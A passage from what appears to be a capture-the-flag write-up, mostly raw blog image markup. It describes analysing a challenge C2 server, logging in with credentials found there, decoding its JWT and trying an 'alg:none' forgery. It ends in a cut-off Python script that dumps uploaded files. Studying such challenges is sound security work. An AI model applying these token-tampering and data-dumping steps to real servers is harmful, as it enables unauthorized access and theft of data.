url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABUklEQVQY04XQXUvCYBQH8H0P04kzmS/rVtzmS4iWr+h82WyMzcRZChFdRRBkWJlOCcUuugnqspu+QJd+ib7Mv2cjCL3p4sc5fx44POdQ2UweLMvC72cIv4NhfP9gEAwGN4RCIadSg8EFZFmFquoOXe9AUTTUarKjWm2iUmk6vSTZWSa5Do7jEIlENthDqfX6G6vVO5aLV0ynLxgOLeRyRfC8AFGMQxAIXoT4W2MxgeCxRwZyW8LhMChr9oZ6Q0cmW0Jq/wA+so5rxwW3xw3a6yVoeAkPTZM3HwKBAHYJdmtlm3066vPjC+PbRzzPF5jeTTAfz7C0FrDuLZz1ehiYJzg1T3He70OWauSnAlKJBJLxOJKi+IfkWDQKanJ9g6fRA0aXVzDbHXR1A6ZxjK7RhibL0BQFWqsFQ1Vx1GigWipBKpdRLRRQyecddi8VizhMp/EDnfLdJS7mAekAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3a1e5fbd1395573319009d672e5c0723/8ac56/image-20240707135209625.webp 240w,\n/static/3a1e5fbd1395573319009d672e5c0723/d3be9/image-20240707135209625.webp 480w,\n/static/3a1e5fbd1395573319009d672e5c0723/e46b2/image-20240707135209625.webp 960w,\n/static/3a1e5fbd1395573319009d672e5c0723/144c0/image-20240707135209625.webp 1268w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3a1e5fbd1395573319009d672e5c0723/8ff5a/image-20240707135209625.png 240w,\n/static/3a1e5fbd1395573319009d672e5c0723/e85cb/image-20240707135209625.png 480w,\n/static/3a1e5fbd1395573319009d672e5c0723/d9199/image-20240707135209625.png 960w,\n/static/3a1e5fbd1395573319009d672e5c0723/bc3ae/image-20240707135209625.png 1268w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3a1e5fbd1395573319009d672e5c0723/d9199/image-20240707135209625.png\"\n            alt=\"image-20240707135209625\"\n            title=\"image-20240707135209625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/594816676fa4c2e91f80ed664d98996c/d5c6f/image-20240707135304298.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB20lEQVQoz22Su09TcRTH75/SJ0tL+xdoQqRChKRWE8TBzdpBJlxNYLKMRoQwSExjXCi0pMTBR9rS5719UEBMIKSWlrZYLNSyOJmP515YjAyfnO95/M75Dj9l+NZt7HY7FrMJi8X8H9araLNZZc5mMDBgx+Fw/IPT6TSiMv3sOf4nUzz2PzXwB6aYfPgI370JfPcn8foecNc3wZ0xL8MjY3hGxhkSEyaLBZPVivkKPTcLSu97m7PDI3rVBt2DGv1ak/2cRiWeoPAxTvFzgsqXOLF373n7ap7Q/AKh14sszM3xcnb2kpkZFoNBpgMBlDNN5Tid4kTN00ylaGXTnGoa5zs7dHJZfggdVeVi7yu/trbolcv0t7f5fbBPX9dSu5DZP9Uqn0IhFP1xK6/KohzNTEaWp2lrBY6zWerJJPXNTdqFq1z0USJJM5+nIXM10XUx0ZDeidQiS0so56USHbnSzuVopTN0ZFl/7xvdUplTcabH3u6u4fpnsSi1S/d6T6915f1ZpWK4/7C8LA5lqKZfFjcNuXYoUYtEKUajqOEw5Y0NCuvraGtrqKthioaOoK6sSL5KKRYz+uXoOm9eBFG8o6OMezwGuh66cdP4Am6X63rcblyDg9f2nPJt/gLu565N6R4jAwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/594816676fa4c2e91f80ed664d98996c/8ac56/image-20240707135304298.webp 240w,\n/static/594816676fa4c2e91f80ed664d98996c/d3be9/image-20240707135304298.webp 480w,\n/static/594816676fa4c2e91f80ed664d98996c/e46b2/image-20240707135304298.webp 960w,\n/static/594816676fa4c2e91f80ed664d98996c/8f19f/image-20240707135304298.webp 1261w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/594816676fa4c2e91f80ed664d98996c/8ff5a/image-20240707135304298.png 240w,\n/static/594816676fa4c2e91f80ed664d98996c/e85cb/image-20240707135304298.png 480w,\n/static/594816676fa4c2e91f80ed664d98996c/d9199/image-20240707135304298.png 960w,\n/static/594816676fa4c2e91f80ed664d98996c/d5c6f/image-20240707135304298.png 1261w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/594816676fa4c2e91f80ed664d98996c/d9199/image-20240707135304298.png\"\n            alt=\"image-20240707135304298\"\n            title=\"image-20240707135304298\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After analyzing the packets, I found that this C2 server collects the device’s environment variables and uploads them as files to <code class=\"language-text\">/api/env</code>.</p>\n<p>Also, I eventually found that I could log in to the server running as the C2 service with the following credentials.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 944px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlUlEQVQY06WQsQ6EIBBE+QQVJUYqLIyCjZ1QEApCQrDx/z9mLkt/lzMWb2eT3ZlimBACwzCA9C1934OFELAsC5RSmOf5J/TzDbpP0wTmvce+7zDGVNVaY9u2R6zrWr0UzO77Rs4ZpRRc14WUEqy1cM79zXmeiDHiOA4wGuM4gnNeO6A+SZ9C/q7rwKSUdWmaBm3bvuYDTzimbzohJQIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/568e2e2fe50455c27210412994cdcc7e/8ac56/image-20240707140002897.webp 240w,\n/static/568e2e2fe50455c27210412994cdcc7e/d3be9/image-20240707140002897.webp 480w,\n/static/568e2e2fe50455c27210412994cdcc7e/59b61/image-20240707140002897.webp 944w\"\n              sizes=\"(max-width: 944px) 100vw, 944px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/568e2e2fe50455c27210412994cdcc7e/8ff5a/image-20240707140002897.png 240w,\n/static/568e2e2fe50455c27210412994cdcc7e/e85cb/image-20240707140002897.png 480w,\n/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png 944w\"\n            sizes=\"(max-width: 944px) 100vw, 944px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/568e2e2fe50455c27210412994cdcc7e/966a0/image-20240707140002897.png\"\n            alt=\"image-20240707140002897\"\n            title=\"image-20240707140002897\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, although I could log in, these credentials still did not allow me to display the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 482px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVQoz5WRzWrCQBSF8xJBJT+TiQZiTMRNjRFs/EGN1J2+gIGsUiELN2bVVSm0z9FdX8FN6cZV3+g0d4pWq1C6+DhnbmYu99xIzWYTy+USo9EIQRAIOp2O0Ha7jeFwiDAM4fs+5vM5BoMBGGPgnF9F8jwPeZ4L0jTFdrtFlmWI4xhJkmC1WonzZrPBer3GYrGAYRgXjQ41Sdd1yLKMUqkERVFQLpcFlUpFQDVSqpHXNE1A7wjyh2akkl2v466IEs1mCPv9by0iUtTJZHLUKIrEWrrdLsbjsfDT6VSswDTNnwmrJodn12BbVVhch2tbcBwHjUYDrusKyNOuydeLAUgPd6h+1pC1erDyHYLHd9w87WHev55F+g39kNPzRWTWuoXz8IHe8x7+yydq2dvVpf/FcUJuMDBNhaKqUAuYroEXH42TS//hC6NK+1CjhDm2AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e5ac43fc21bfe516badd46b01808c640/8ac56/image-20240707140046436.webp 240w,\n/static/e5ac43fc21bfe516badd46b01808c640/d3be9/image-20240707140046436.webp 480w,\n/static/e5ac43fc21bfe516badd46b01808c640/da7ca/image-20240707140046436.webp 482w\"\n              sizes=\"(max-width: 482px) 100vw, 482px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e5ac43fc21bfe516badd46b01808c640/8ff5a/image-20240707140046436.png 240w,\n/static/e5ac43fc21bfe516badd46b01808c640/e85cb/image-20240707140046436.png 480w,\n/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png 482w\"\n            sizes=\"(max-width: 482px) 100vw, 482px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e5ac43fc21bfe516badd46b01808c640/37e0d/image-20240707140046436.png\"\n            alt=\"image-20240707140046436\"\n            title=\"image-20240707140046436\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I captured a HAR file, I found that a JWT token is generated at login, and the flag is requested by sending a POST request to <code class=\"language-text\">/api/flag</code> using that JWT token.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/aba78ae06004b4ae7cfa656d6827bab5/ae21e/image-20240710225240385.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVElEQVQI143MSwqAMAwE0F5HbH62TcXg/Y81huJWcPEYhoQpRwQ2ZezNoHO8HHpOiHdQb2BTcP6wyidJRIRyx4VaaRUTxcjDNFs8R1wIPY0fKbnxALRfPquZhNEqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/aba78ae06004b4ae7cfa656d6827bab5/8ac56/image-20240710225240385.webp 240w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/d3be9/image-20240710225240385.webp 480w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/e46b2/image-20240710225240385.webp 960w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/f992d/image-20240710225240385.webp 1440w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/c3c33/image-20240710225240385.webp 1537w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/aba78ae06004b4ae7cfa656d6827bab5/8ff5a/image-20240710225240385.png 240w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/e85cb/image-20240710225240385.png 480w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/d9199/image-20240710225240385.png 960w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/07a9c/image-20240710225240385.png 1440w,\n/static/aba78ae06004b4ae7cfa656d6827bab5/ae21e/image-20240710225240385.png 1537w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/aba78ae06004b4ae7cfa656d6827bab5/d9199/image-20240710225240385.png\"\n            alt=\"image-20240710225240385\"\n            title=\"image-20240710225240385\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/29742c030191b401bd702c89e6757f5a/c8ad9/image-20240710225317328.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVQoz41SWa7DIBDLZbLAC0tWEkJf1PsfysW0RGmlqvmwGAbweDwUt1uA0gazWxD+7xjGEdM0YfUe8zzDxTwxDAOstbBdF9fvKIwxqOs6PSB5VVVomgaLX8AzISWEECnHe79QtG2LsiyhtYaPqmQkIFhAKf0kixAJ8icKpVRSRUKSsAofr+sKnjUXVL0pzIQqEoYQQMWsNEYvpfxLyCqv4E1h3/fJK7bMWMdhGWPTnvkrSIT0kAPwsU0mqcg5l9Y8JMbZXymfnspXTpzWg7CL34Ek2cN937FtWwKtoL8smsGOPmNyHYT8YyQRr4mSICvLSnkvg/tPHEPJLXMQPCABY1Y+Kzkr+ubhAyBGLqzJ8gzgAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/29742c030191b401bd702c89e6757f5a/8ac56/image-20240710225317328.webp 240w,\n/static/29742c030191b401bd702c89e6757f5a/d3be9/image-20240710225317328.webp 480w,\n/static/29742c030191b401bd702c89e6757f5a/e46b2/image-20240710225317328.webp 960w,\n/static/29742c030191b401bd702c89e6757f5a/f992d/image-20240710225317328.webp 1440w,\n/static/29742c030191b401bd702c89e6757f5a/156b8/image-20240710225317328.webp 1564w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/29742c030191b401bd702c89e6757f5a/8ff5a/image-20240710225317328.png 240w,\n/static/29742c030191b401bd702c89e6757f5a/e85cb/image-20240710225317328.png 480w,\n/static/29742c030191b401bd702c89e6757f5a/d9199/image-20240710225317328.png 960w,\n/static/29742c030191b401bd702c89e6757f5a/07a9c/image-20240710225317328.png 1440w,\n/static/29742c030191b401bd702c89e6757f5a/c8ad9/image-20240710225317328.png 1564w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/29742c030191b401bd702c89e6757f5a/d9199/image-20240710225317328.png\"\n            alt=\"image-20240710225317328\"\n            title=\"image-20240710225317328\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I decoded this token, it appeared to specify 0 as the <code class=\"language-text\">subject_id</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/5b587/image-20240710225446024.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAl0lEQVQoz62Q6w6DIAyFef8XdYoQoa3DC5xZNsziP7M1+XJOb4TUuOAxJwE/6UQSg+Z4ED4aL/m1/kZ3Tdc90PcDrLUY7YhB/WDhvQcRg5mrElH1wlK9IiK1xtqPhJwLzLquWJYFqt9s24Zc8jF0g2PeTNOE9uiVlNJtTAgB+77XHzVtaH4XQxThnKv3+EeYUsp5A/W/8gK1niQL8jdQ3AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/8ac56/image-20240710225446024.webp 240w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d3be9/image-20240710225446024.webp 480w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/e46b2/image-20240710225446024.webp 960w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/93852/image-20240710225446024.webp 1010w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/8ff5a/image-20240710225446024.png 240w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/e85cb/image-20240710225446024.png 480w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d9199/image-20240710225446024.png 960w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/5b587/image-20240710225446024.png 1010w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d9199/image-20240710225446024.png\"\n            alt=\"image-20240710225446024\"\n            title=\"image-20240710225446024\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The response also stated that Subject 0 does not have permission to access it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 423px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABgElEQVQoz42Sv26CUBTGeQgaKyAI9E8c1ChgUBJBDEJU4mjSzejm4mBjRNu4+xQdOnVvh6av1bFfucdorK1Jh1/OveccvpzzXbjxeIx2u41+vw/HcejcbDbhui5F3/cRxzHdgyDAcDhEq9VCLpeDqqq/4LbbLdbrNTabDZbLJebzOZIkwWQywWw2w2g0wmKxwGq1op7pdEqioihC1/UfYvl8HhzP88hmsxAEgZqOoyRJB1gPy8uyTLAJWX4fFUXZTdhoODBMM8WCaVmoVCool8swDBPVapXOLFppzTAMujNYH8uZ6be2baNQKJAoN+h3EXdDuI6NKPARhR3yyE/p9XrodDoIw5A8ZrCa53mIoojye//r9TpNy2X0InithAu9jMurEkRZTVdja0uH9fcWHNtwWmM20MrFpy90Xz4Rp1SfAXlwD03goenX0DTt3xwe5TZ5R+3xDbWHV9wkH5C9O6hiBqqmI3/0en/9Iqc1ElRyIiRxBzurikxCu8bzQuf4BiCDIL3xEXXyAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4f598e1b59d7cff6ec15748a559d5fca/8ac56/image-20240710225527867.webp 240w,\n/static/4f598e1b59d7cff6ec15748a559d5fca/2c5ea/image-20240710225527867.webp 423w\"\n              sizes=\"(max-width: 423px) 100vw, 423px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4f598e1b59d7cff6ec15748a559d5fca/8ff5a/image-20240710225527867.png 240w,\n/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png 423w\"\n            sizes=\"(max-width: 423px) 100vw, 423px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png\"\n            alt=\"image-20240710225527867\"\n            title=\"image-20240710225527867\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried to see whether I could tamper with the JWT token, but the <code class=\"language-text\">\"alg:none\" attack</code> did not seem to work.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/081ff/image-20240711054607530.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAf0lEQVQY06VPyw6DMAzr/38k0g48yrbSNhxIaeqZadsJcVkiywcnTuyej4BVBLpX5CSYxjtiTFBVmBlqrcSXz2HUd+4veYXr+xldd4P3E9Jh6COWGKFFURsX7BrW7MeN7YYhYORXIhmlFAoUj/4MXhmcsQtBGJGRdXtH5JG/6gV10TmwLX2mawAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/8ac56/image-20240711054607530.webp 240w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/d3be9/image-20240711054607530.webp 480w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/e46b2/image-20240711054607530.webp 960w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/f992d/image-20240711054607530.webp 1440w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/882b9/image-20240711054607530.webp 1920w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/79080/image-20240711054607530.webp 2182w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/8ff5a/image-20240711054607530.png 240w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/e85cb/image-20240711054607530.png 480w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/d9199/image-20240711054607530.png 960w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/07a9c/image-20240711054607530.png 1440w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/29114/image-20240711054607530.png 1920w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/081ff/image-20240711054607530.png 2182w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/d9199/image-20240711054607530.png\"\n            alt=\"image-20240711054607530\"\n            title=\"image-20240711054607530\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://scgajge12.hatenablog.com/entry/jwt_security#31-%E3%82%A2%E3%83%AB%E3%82%B4%E3%83%AA%E3%82%BA%E3%83%A0alg%E3%81%AE%E6%93%8D%E4%BD%9C\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">An introduction to JWT from a security perspective - blog of morioka12</a></p>\n<p>When I checked the behavior of the C2 server again, I confirmed that issuing a GET request to list <code class=\"language-text\">/api/env/</code> returns random strings, as already seen.</p>\n<p>Also, when I analyzed the packet capture, I saw that sending a POST request to <code class=\"language-text\">/api/env/</code> reported that data had been uploaded using a random string as the filename.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 609px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAzElEQVQoz61R2Q6CMBDs/3+d4pNHasJp5BBEBdpuxy2mGkngRSeZnunszFaUVYmqqmCMgbX2ZwonRER/ERsFLYDu3gKk4UH2VcDBz9PzOQg3aKUg9wes1iskcYqbahHX8ci8PSO/5UjqCGlzguZEvtCsQ4ejlNgEAba7PZTRyK4nZsYiCbImRVSHCC8hC8dI3J7XspBcrGDnnzRijErqy7a78PE8XZ+X4Fsh7r3mWD2unUbZDqgfavHRHN8ODVkMmrg3LypDi4+nHzXFE6pHdB7CruGVAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/541b8036e8c66a0498494f79628d2176/8ac56/image-20240711055306852.webp 240w,\n/static/541b8036e8c66a0498494f79628d2176/d3be9/image-20240711055306852.webp 480w,\n/static/541b8036e8c66a0498494f79628d2176/117a4/image-20240711055306852.webp 609w\"\n              sizes=\"(max-width: 609px) 100vw, 609px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/541b8036e8c66a0498494f79628d2176/8ff5a/image-20240711055306852.png 240w,\n/static/541b8036e8c66a0498494f79628d2176/e85cb/image-20240711055306852.png 480w,\n/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png 609w\"\n            sizes=\"(max-width: 609px) 100vw, 609px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png\"\n            alt=\"image-20240711055306852\"\n            title=\"image-20240711055306852\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So, for now, I dumped all uploaded information with the following script.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> requests\n\nwords <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"YeIzRgKdWkx6EhyH8FPtQinoUI42yR7B\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"SENmvOvr1rC4BQQ7ugTi2Mht9UXUFQQH\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"3b2NQO9CM7ZinEyVNQkwkVx5r684TIwl\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AbZ9FbNDzJ5ACbGKJ8ezjdod2Jr4x0iW\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"eWnjieXEMQ7Bj6tpLluchBBH7sDsCt3M\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"hLJh9TRNut3rSLWJQ6CsGs3OuNjmfYxb\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"M5ZU5KLyrjulq7QpLhKiJMwRrAMq3MZq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1awDrBxaMbwAhOcvfyntbliw3qanrSKT\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"FIJRM8kwWj1ye4JwPHg7IJg7PxJBtoXX\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"iu19ErtsjrQgTMohSnGJ46iMVai9ONOZ\"</span><span class=\"token 